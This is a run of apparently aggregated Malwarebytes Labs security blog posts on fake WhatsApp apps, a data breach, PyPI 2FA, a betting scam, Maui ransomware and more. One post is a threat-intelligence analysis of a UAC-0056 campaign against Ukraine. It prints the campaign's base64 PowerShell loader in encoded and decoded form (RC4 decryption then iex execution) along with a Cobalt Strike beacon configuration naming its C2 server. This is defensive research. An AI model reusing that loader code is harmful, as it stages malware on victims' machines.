WhatsApp boss Will Cathcart is warning users of the popular messaging app to be on their guard after the WhatsApp Security Team discovered bogus apps packing a hidden punch in the form of malware.

Outside the safety of the walled garden

App stores do whatever they can to try and prevent bogus programs making it onto the storefront. While the majority of apps on legitimate stores are likely safe, rogues do get through. To avoid the hassle of dodging safety checks, malware authors host their infected files elsewhere. If they can draw device owners outside the relative safety of a storefront, they have more scope for infecting a mobile.

Sure enough:

There’s no detailed rundown of what the fake WhatsApp versions were getting up to on devices. What Cathcart does say is that these programs promised new features, but were specifically designed to steal personal information stored on victim’s phones.

Google Play Protect on Android now detects and disables previously downloaded versions of the fake WhatsApp apps, and the Google Play store shouldn’t experience any threat from these apps.

This is great news for those inside the walled garden, but what about those sitting outside?

(Un)official store safety

Depending on which version of Android you run, your settings and options available likely differ from model to model. However, in settings there’s usually an option which asks if you wish to download or install files from unknown sources.

What this means is “Do you want to install apps from outside the Google Play store”. This isn’t quite as nefarious as it sounds. Mobile networks and other organisations often offer downloadable software as part of their phone contracts. However, these app downloads may be offered outside of the Play Store. This is where the unknown source option comes into play.

A lot of the time, downloading these files outside of the store isn’t needed. The apps offered directly from organisations can be found on the Play Store anyway, in identical format. So it’s best to only download apps from the Play Store if at all possible.

WhatsApp: accept no imitations

WhatsApp recommends you only download the app from official stores. You can find links for both Android and iPhone on the official download page. WhatsApp has been known to hand users temporary bans if it finds evidence of people using unsupported versions on their devices. If you’re using a listed unsupported app, which is an altered version of the original, you’ll receive a temporary ban for that too.

It seems that the safest and most straightforward course of action is to avoid unofficial downloads, and follow WhatsApp’s advice for responsible app use.

The post WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info appeared first on Malwarebytes Labs.

This blog was authored by Roberto Santos and Hossein Jazi

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

Different themes, same techniques

Since the publication of our blog post There’s a Go Elephant in the room, we have tracked several new samples as can be seen in the timeline below:

Let’s dig further into those relationships. UA-CERT has attributed the document named “Information on the availability of vacancies and their staffing.xls” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

In the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls:

The Help Ukraine lure, to our knowledge, has never been publicly documented before:

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Also, in the past we have found comments regarding to a domain named ExcelVBA[.]ru. This document was contacting a suspiciously similar domain named excel-vba[.]ru.

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine!

Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (Information on the availability of vacancies and their staffing.xls). The analysis is still valid for the others, while minor changes exist between samples.

write.bin

The document will download an executable file named write.bin. Other attacks following the same scheme used different names for this file, including Office.exe, baseupd.exe and DataSource.exe. The file is slightly obfuscated, and performs the following actions:

Establishing persistence

After some antidebug tricks, the registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRunCheck License is used to establish persistence. HKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdate Checker, is checked first because that was the key used by previous versions of the malware.

Dropping next stage

Next step is dropping a file in C:ProgramDataTRYxaEbX.  This file will be used later.

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:ProgramDataTRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in C:ProgramDataTRYxaEbX will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Here we can see some of the actions that will be taken:

• Disable script logging
• Disable Module Logging
• Disable Transcription
• Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Cobalt Strike payload deployed

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

BeaconType                    – HTTPS

Port                              – 443

SleepTime                       – 30000

PublicKey_MD5              – defb5d95ce99e1ebbf421a1a38d9cb64

C2Server                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

UserAgent                       – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap

HttpPostUri                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

Watermark                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

Attacker probes the sandbox

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

Attribution to UAC-0056

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

IOCs

Malicious Excel documents (Help Ukraine template)

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

Malicious Excel documents (Humanitarian template)

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

Payloads

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

Cobalt Strike beacon and payloads

136.144.41[.]177
syriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/
syriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/
skreatortemp[.]site
imolaoggi[.]eu

The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

The hugely popular Manga comics platform Mangatoon has fallen victim to a data breach. No fewer than 23 million user accounts could be at risk, thanks to a poorly secured database. Worse still, Mangatoon doesn’t seem to be responding to messages from the breacher, or people notifying it that the breach has taken place.

A limited edition run of exposed accounts

Mangatoon allows comics fans to read a variety of web comics for free via the app, with the option to “unlock” whole comics for a fee. Unfortunately for Mangatoon, its Elasticsearch database was compromised leading to several attempts to get its attention.

No response was forthcoming by email or even social media. While it’s possible everyone involved is too busy fixing the problem, the complete lack of a reply is concerning.

Checking for exposure

The breach data, which occurred in May, has been loaded into popular breach checking service Have I been pwned.

You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.

Password disasters of our time

The 23 million or so accounts have been exposed purely because of bad password management. All of this data was, incredibly, sitting behind the “password”.

Mangatoon changed the password after the system breacher notified it. However, no customers have been notified and anyone unaware would think everything is currently business as usual. The truth is that things couldn’t be further from the case. Are there other, similarly poorly secured databases? Has the password been changed to something that isn’t “password123”?

Elasticsearch makes use of a variety of security features for all manner of configurations, so will Mangatoon be making use of these in future?

So many unanswered questions in a situation such as this isn’t massively reassuring.

Lock down your databases

Poorly secured Elasticsearch databases are juicy targets for those up to no good. At least 450 ransom notes were discovered demanding payment in return for files found on Elasticsearch databases back in June of this year. Sadly for anyone paying up to recover the stolen files, there’s a good chance the attackers had already deleted them. This is, of course, a valuable reminder to back up your data.

This is especially true considering Elasticsearch sits alongside both Redis and MongoDB as some of 2022’s top exposed databases.

If you use Mangatoon you should change your password to your account now. If you’ve used the same username and password combination on other accounts, you should change those too.

The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.

The Python Package Index (PyPI) says it has begun rolling out a two-factor authentication (2FA) requirement which enforces maintainers of critical projects to have 2FA enabled to publish, update, or modify them. PyPI plays an important role in the Python developers’ ecosystem.

Python repository

PyPi is the repository of software for the Python programming language. Python is a high-level, interpreted, general-purpose programming language. And it is a very popular language often used on servers to create web applications.

Many web developers, and others, use Python packages or add-on libraries from other developers as building blocks to develop their own projects. The Python Software Foundation (PSF) manages the PyPI repository where Python developers can get third-party developed open-source packages for their projects.

Critical projects

The projects rated as critical by the PSF are those that are in the top 1% of downloads. Maintainers of such projects should have received an email about the new requirement. The requirement will go into effect in the coming months. Based on the 1% rule, over 3,500 projects have received the critical designation.

The good news is that every project has the option to set 2FA as required. And, to ensure that maintainers of critical projects have the ability to implement strong 2FA with security keys, the Google Open Source Security Team has provided a limited number of security keys to distribute among critical project maintainers.

The reason

As you can imagine, unauthorized access to a project that many other depend on opens up the possibilities of a software supply chain attack. So, introducing the 2FA factor for critical projects decreases the possibility that someone might introduce malicious code into a popular project.

We have all seen the problems with Log4j. For those that missed it, Log4j is an open source logging library written in Java developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular, so the potential reach of this problem turned out to be enormous.

A similar problem that remains unresolved by these new requirements is the use of packages which are purposedly named after popular projects to confuse users into downloading a malicious version.

Mixed feelings

As you would expect on Twitter, there are some mixed feelings among those impacted by this new requirement. Ranging from developers saying goodbye to their popular project to those wondering why 2FA wasn’t already mandatory in the first place.

For all those with unanswered questions, PyPI has put up a FAQ about the 2FA implementation, along with the key giveaway.

The post PyPI starts rolling out required 2FA for important projects appeared first on Malwarebytes Labs.

An incredible scam which resembles hidden camera prank shows has been shut down by police. Four men were arrested last week in connection with the con-job involving fake cricket and online betting. It begins in Russia, takes a trip to India, and ends up back in Russia. Here’s how it unfolded:

Setting the stage

People living in India who are interested in betting on sports tend to gravitate online. One of the men allegedly involved in this scam had previously worked in a bar in Russia. He’d convinced his contacts there to show interest in cricket betting, which turned out to be the starting point for all of the below.

Our intrepid bar worker returned to India, and what followed is an amazing exercise in online deception, offline activities, fictional visions of reality, and at least 20 people playing roles day in and day out.

Before we get to the real world shenanigans, let’s take a look at the YouTube angle.

The YouTube cricket carnival

The fake cricket matches were all hooked to one Youtube channel called Century Hitters T20. At time of writing, the channel is still live and we suspect it’ll be kept that way while investigations proceed. It’s racked up 809 subscribers with 49k views across 47 videos since it was created roughly a month ago.

It’s not possible to embed any of the streams, because the account creators have disabled that feature. Apart from the absolutely awful cricket pitch, a lot of effort has gone into lighting, visuals, camera equipment, screen graphics, even the various cricket team outfits. This leads us neatly on to the real-world component of this large scale fake out.

Fake it till you make it

This isn’t some small time operation with a fake office in a basement somewhere. The people behind this thought big and stuck to their goal. A small village was used as the staging area for the scam. According to reports, “nearly two dozen locals” were paid to act as cricket teams, umpires, and organisers. One person even imitated a well-known cricket commentator.

Players were paid $5 per game. Fake umpires used walkie-talkies to talk to organisers, and directed the shape of each supposed cricket match. The organisers would converse with people making bets via Telegram.

To simulate the roar of the cricket-loving crowds, running commentaries complete with cheering were piped through speakers close to the cricket ground. And by cricket ground, I mean “muddy mess with a bit of grass poking up through the soil”.

They presumably picked their Russian marks well. Nobody even vaguely familiar with professional cricket would believe that real players would grace that monstrosity with their presence. There’s no mention of losses incurred by those the scammers preyed on. For now all we can do is wait and watch how this one plays out in court. Hopefully with fewer fake crowd recordings.

The post Fake streamed cricket matches knocks victims for six appeared first on Malwarebytes Labs.

If regulators have their way, data transfers from Facebook and Instagram between Europe and the United States could stop this summer. (WhatsApp, another Meta service, will not be affected by the decision as it has a different data controller within Meta.) This could force Meta, Facebook’s parent company, to undergo some radical changes with the way it handles data from Europe, such as setting up local data centers. Otherwise, it will have no choice but to pull out of Europe.

The Irish Data Protection Commission (DPD) sent a draft of its final decision on Thursday to its European counterparts regarding banning Meta from receiving user data from Europe.

A Meta spokesperson told the Telegraph, “This draft decision, which is subject to review by European Data Protection Authorities, relates to a conflict of EU and US law which is in the process of being resolved.”

“We welcome the EU-US agreement for a new legal framework that will allow the continued transfer of data across borders, and we expect this framework will allow us to keep families, communities and economies connected.”

Ireland is the country overseeing Facebook’s data practices as it is Facebook’s legal headquarters in Europe. Any ruling in Ireland would apply to all of Europe.

In 2020, the Court of Justice of the European Union (CJEU) repealed the EU-US Privacy Shield, a legal framework regulating the transatlantic transfer of European data to the US, calling it invalid as it failed to keep European personal data from being excluded from US surveillance. This event is commonly known as the Schrems II case.

However, data from the EU to the US continue to flow. While the CJEU annulled Privacy Shield, it also confirmed the legitimatimacy of the Standard Contractual Clauses (“SCCs”), which Facebook (and other US businesses) used as an alternative to lawfully transfer data from the EU to the US. Should the regulators’ decision become final, Meta will be forced to stop relying on the SCC as well.

“Suspending data transfers would be damaging not only to the millions of people, charities and businesses in the EU who use our services, but also to thousands of other companies who rely on EU-US data transfers to provide a global service,” a Meta spokesperson told SiliconRepublic.com. “A long-term solution on EU-US data transfers is needed to keep people, businesses and economies connected.”

In an interview with The Telegraph, Max Schrems, the privacy campaigner responsible for Privacy Shield getting binned, expected Facebook to use the Irish legal system to delay the implementation of the data transfer ban. He also added that Irish police would need to “physically cut the cords before these transfers actually stop”.

The post Europe threatens to ban Facebook over data transfers to the US appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• My Body, My Data Act would lock down reproductive and sexual health data
• “Free UK visa” offers on WhatsApp are fakes
• HackerOne insider fired for trying to claim other people’s bounties
• Update now! Chrome patches ANOTHER zero-day vulnerability
• Cloud-based malware is on the rise. How can you secure your business?
• TikTok is “unacceptable security risk” and should be removed from app stores, says FCC
• Google to delete location data of trips to abortion clinics
• IconBurst software supply chain attack offers malicious versions of NPM packages
• Discord Shame channel goes phishing
• Verified Twitter accounts phished via hate speech warnings
• Apple Lockdown Mode helps protect users from spyware
• Report: Brazil must do more to encrypt, back up data
• YouTube AI wrongfully flags horror short “Show for Children” as suitable for children
• Fake job offer leads to $600 million theft
• 4 ways businesses can save money on cyber insurance
• North Korean APT targets US healthcare sector with Maui ransomware
• How the FBI quietly added itself to criminals’ instant message conversations

Stay safe!

The post A week in security (July 4 – July 10) appeared first on Malwarebytes Labs.

We’re seeing several reports indicating that Microsoft may have rolled back its decision to block Macros in Office. Currently no official statement exists—the reports rely on a post by a Microsoft employee in the replies of the original article where the plan to block macros was announced.

Earlier this year, Microsoft decided to disable macros downloaded from the Internet in five Office apps, by default. Users trying to open files downloaded from the Internet that contained macros would see a message, with a link to an article explaining the block.

SECURITY RISK: Microsoft has blocked macros from running because the source of this file is untrusted

Malicious macros have been popular with criminals for more than three decades, and the step was welcomed by the security community. However, some users of Microsoft products have queried a surprising change. Dangerous files downloaded from the internet are not being treated as expected in Office.

The shifting sands of macro blocking

Bizarrely, we’ve only experienced a few months of no macro worries as people discover the currently changing situation. A recent comment on the article describing the block mentioned that macro blocking has now been removed in Office Current Channel:

Is it just me or have Microsoft rolled this change back on the Current Channel?

I was trying to reproduce the pinkish-red ‘Security Risk… Learn More’ notification in the Message Bar, in preparation for demonstrating the new default behaviour for a YouTube video I’m putting together about my company’s macro-enabled toolkit.

Created a simple .xlsm to show a MsgBox in the open event of the workbook, saved it and uploaded it to cloud storage, deleted it from my local storage, re-downloaded it from cloud storage (to a non-trusted location, my Downloads library)… did not use the Unblock checkbox on the Properties dialog to remove the mark of the web… then opened up the file.

It first went into Protected View (expected behaviour), but then after I clicked Enable Editing, instead of getting the pink/red message about macros being blocked altogether, I just got the old ‘Security warning…’ message with the ‘Enable Content’ button. The file’s VBA project wasn’t digitally signed, wasn’t saved to a Trusted Location, and still had the mark of the web on it… so macros should have been blocked.

A response came from someone called Angela Robertson, billed as “A Microsoft employee on the Microsoft Tech Community”:

Based on feedback received, a rollback has started. An update about the rollback is in progress. I apologize for any inconvenience of the rollback starting before the update about the change was made available.

Waiting for more information

At the time of writing, we can’t say what this community feedback is or why it’s been so influential in triggering the apparent decision to disable macro blocking. The response in security circles is somewhat less than enthusiastic, and there’s no new information outside of waiting to see what’s contained in the promised “update”.

Indeed, all we have currently is a second Microsoft post which confirms the rollback:

…based on feedback, we’re rolling back this change from Current Channel production. We appreciate the feedback we’ve received so far, and we’re working to make improvements in this experience. We’ll provide another update when we’re ready to release again to Current Channel. Thank you.

We will update this article as soon as Microsoft clarifies what exactly is going on.

The post Microsoft appears to be rolling back Office Macro blocking appeared first on Malwarebytes Labs.

State-sponsored North Korean threat actors have been targeting the US Healthcare and Public Health (HPH) sector for the past year using the Maui ransomware, according to a joint cybersecurity advisory (CSA) from the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury.

CISA Director Jen Easterly also announced the CSA on Twitter.

The FBI started responding to incidents involving Maui in May 2021. This ransomware, which threat intelligence firm Stairwell first profiled, is relatively new.

North Korean state-sponsored cyber-actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services. In some cases, these incidents disrupted the services provided by the targeted HPH Sector organizations for prolonged periods.

– CSA Alert (AA22-187A)

Unlike the ransomware we usually see, that plagues organizations and regularly hits the news, Maui is never sold or offered to affiliates as a ransomware-as-a-service (RaaS) tool. It is, instead, developed and used privately for state-backed actors.

Most notably, attackers operate Maui manually. This is on purpose, so attackers have more control over which files to encrypt when Maui is executed.

“When executed at the command line without any arguments, Maui prints usage information, detailing supported command-line parameters,” Stairwell Principal Research Engineer Silas Cutler wrote in the report. “The only required argument is a folder path, which Maui will parse and encrypt identified files.”

“Embedded usage instructions and the assessed use of a builder is common when there is an operational separation between developers and users of a malware family.”

Maui also has other unusual features—it doesn’t drop a ransom note, and uses a three-layer encryption methodology reminiscent of Conti and ShiOne.

“Instead of relying upon external infrastructure to receive encryption keys, Maui creates three files in the same directory it was executed from containing the results of its execution. These files are likely exfiltrated by Maui operators and processed by private tooling to generate associated decryption tooling,” Cutler said.

The FBI shared the indicators of compromise (IOCs) in its advisory.

Malwarebytes detects Maui ransomware as Ransom.Maui.

Dealing with Maui ransomware

The advisory also provides mitigation steps organizations can to prepare for, or deal with attacks using Maui ransomware. Thankfully, although Maui may be a little different from run-of-the-mill ransomware, the steps to protect against it are not:

• Maintain off-site, offline backups of data and test them regularly.
• Create a cybersecurity response plan.
• Keep operating systems, applications, and firmware up to date.
• Disable or harden remote desktop protocol (RDP).
• Require multi-factor authentication (MFA) for as many services as possible.
• Require administrator credentials to install software.
• Report ransomware incidents to your local FBI field office.

The various agencies involved also made it clear, once again, that they strongly discourage victims from paying ransoms. It does not guarantee you will get your data back, does not free you from recovery costs (because you still have to harden your system against the next attack), and it marks you as a target for repeat attacks.

Stay safe!

The post North Korean APT targets US healthcare sector with Maui ransomware appeared first on Malwarebytes Labs.

So, your business has just suffered a data breach and it’s time to dig deep in your pockets to pay all the resulting expenses. Without cyber insurance, you can expect to pay a dizzying amount of cash.

In 2022 alone, the average cost of a data breach for businesses under 1,000 employees was close to $3 million—and these costs are coming from activities that cyber insurers typically cover, such as detecting and responding to the breach.

Indeed, with liability limits ranging from $1 million to $5 million or more, cyber insurance policies can cover a good chunk of the damage caused by a data breach.

But if you’re looking to apply for cyber insurance, there’s a few things you should know first—especially if you want the lowest possible premium. 

Here are four ways your business can save money on its insurance.

How is cyber insurance priced?

Before we dive in any futher, it’s important to understand how cyber insurance policies are priced to begin with.

A 2019 paper published to the Journal of Cybersecurity analyzed over 235 cyber insurance policies from New York, Pennsylvania, and California, as well as policies posted publicly on carriers’ websites. They found that cyber insurance companies price their policies one of in four ways:

• Base rate. Insurers provide a base premium based on your organization’s annual revenues or assets (or number of employees/students). The basic logic is that more revenue equals more risk, therefore higher premiums, and vice versa.

• Base rate with security questions. Insurers look at your organization’s security posture to determine the final premium pricing. This was by far the most widely-used approach by insurers (57 percent of policies analyzed). 

• Fixed rate. Insurers provide a fixed rate regardless of firm or industry. This was most common for smaller businesses.

• Fixed rate with hazard groups. This is the same as fixed rate, but with a single modifier based on the amount of perceived risk a business has (such as how much sensitive information is stored on its website). Again, typical for small businesses.

How to save money on cyber insurance 

While it’s clear that the size of your business and the industry you’re in can affect costs, still a large portion of cyber insurance providers are looking at your security to determine premiums. 

So, what are some of the security controls that can lower your premium? 

For this article, we looked at security tips from the top five biggest cyber insurance companies—AXA XL, Chubb, AIG, Travelers, and AXIS—and found four commonalities across what they had to say. 

1. Use multi-factor authentication (MFA)

Did you know that, according to Verizon’s 2022 Data Breach Investigations Report, 50 percent of data breaches start with stolen credentials? 

Given this statistic, it’s no surprise that using multi-factor authentication (MFA) could signal to cyber insurers that you’re less of a risk. By requiring you to use multiple forms of authentication, MFA makes it much more difficult for threat actors to pull off brute force attacks, or to use stolen passwords.

2. Implement a cybersecurity training program

If stolen credentials are the most common initial attack vector in data breaches, then phishing is a close second—accounting for about 17 percent of all data breaches, according to the same Verizon report.

This is why implementing a cybersecurity training program for your employees is so important. 

A good training program should inform employees about common threats such as email phishing, spear phishing, and other common social engineering attacks. Cyber insurers are likely to view the implementation of such programs as a mark of high security maturity.

3. Disable Remote Desktop Protocol (RDP) services

In about 50 percent of ransomware attacks, Remote Desktop Protocol (RDP) was the initial attack vector, according to a study by Palo Alto Networks.

RDP is a network communications protocol that allows users to remotely control their devices. Commonly used by remote workers, RDP is also used by IT staff to troubleshoot problems on employees’ devices.

However, hackers can easily search for computers that use RDP and them use a brute force attack to try to guess the password—and from there, they can carry out a ransomware attack. 

Securing RDP with best practices, such as following the principle of least privilege, removes a potential point of access for hackers. Read our article on how to protect RDP for more tips.

4. Deploy Endpoint Detection and Response (EDR)

According to Ponemon’s 2020 State of Endpoint Security Risk report, the average financial loss from endpoint attacks was almost $9 million in 2019.

Not surprisingly, then, both Travelers and Axis cyber insurance explicitly mention endpoint protection as an important prevention measure.

Endpoint detection and response (EDR) is a form of endpoint protection that detects and protects against ransomware, malware, trojans, rootkits, backdoors, viruses, brute force attacks, and “zero-day” unknown threats. Learn more about how EDR can help secure your business.

Better security means better savings

Without cyber insurance, you can expect to pay a lot of cash to cover the cost of a data breach, and many companies are investing in it as a result. In this article, we explained how cyber insurance policies are typically priced, and how your organization’s assessed security posture is a prime consideration for many insurers. 

We also outlined four key processes and technologies that makes you a much more challenging target to attack, and consequetly a considerably less risky proposition for cyber insurers.

With Malwarebytes Endpoint Detection and Response, you can show cyber insurance companies you’re prepared to handle a cyberattack. To find out more, read how Mike Carney Toyota saved on cyber insurance by deploying Malwarebytes EDR.

The post 4 ways businesses can save money on cyber insurance appeared first on Malwarebytes Labs.